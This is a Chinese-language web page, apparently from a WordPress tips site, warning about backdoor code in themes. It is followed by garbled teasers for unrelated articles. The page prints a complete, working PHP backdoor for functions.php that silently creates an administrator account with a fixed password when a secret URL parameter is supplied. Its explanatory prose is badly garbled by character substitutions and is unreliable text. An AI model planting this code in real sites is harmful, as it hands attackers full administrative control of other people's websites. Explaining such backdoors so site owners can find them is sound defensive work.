add_action( 'wp_head', 'my_backdoor' );
function my_backdoor() {
if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
require( 'wp-includes/registration.php' );
if ( !username_exists( 'backdoor' ) ) {
$user_id = wp_create_user( 'backdoor', 'pa55w0rd!' );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
}
简略阐明下,代码次要放于functions.php文件外面,不会影响任何性能应用,假如存在此代码,任何人只需运转http://www.你的域名.com/?backdoor=go,而后就创立了一个用户名为“backdoor”,明码为:“pa55w0rd!” 的治理员。同样具有治理员的权限,很编辑主题代码文件,置信此时你肯定觉得到很风险了吧,连忙反省反省本人的主题代码吧……
以上就是安达网络工作室关于《防范wordpress主题加后门代码获取管理员权限》的一些看法。更多内容请查看本栏目更多内容!
让媒体库支持pdf分类 这段来自tutsplus的代码能够协助咱们完成如上图所示的成果,将代码放到主题的function...
民间引见: 1,经过插件能够创立adsense广告位。 2,能够间接经过工具在网管中心验证网站。 之前站长David...
要害字形容:罕用 插件 代码 以及 &mdash 文章 即可   而后 统计 这篇文章是我之前为一个香港人...
复制代码代码如下://获取文章评论数,不蕴含作者本人function get_comments_number_filter_author() { g...
本文实例讲述了WordPress添加前往顶部成果的办法。分享给大家供大家参考。详细完成办法如下: 前往顶部成果...
明天装置一个wp主题时分突然前后盾都报错,这就完了,只能去效劳器上修正顺序或许修正配置了,正好搜寻到一...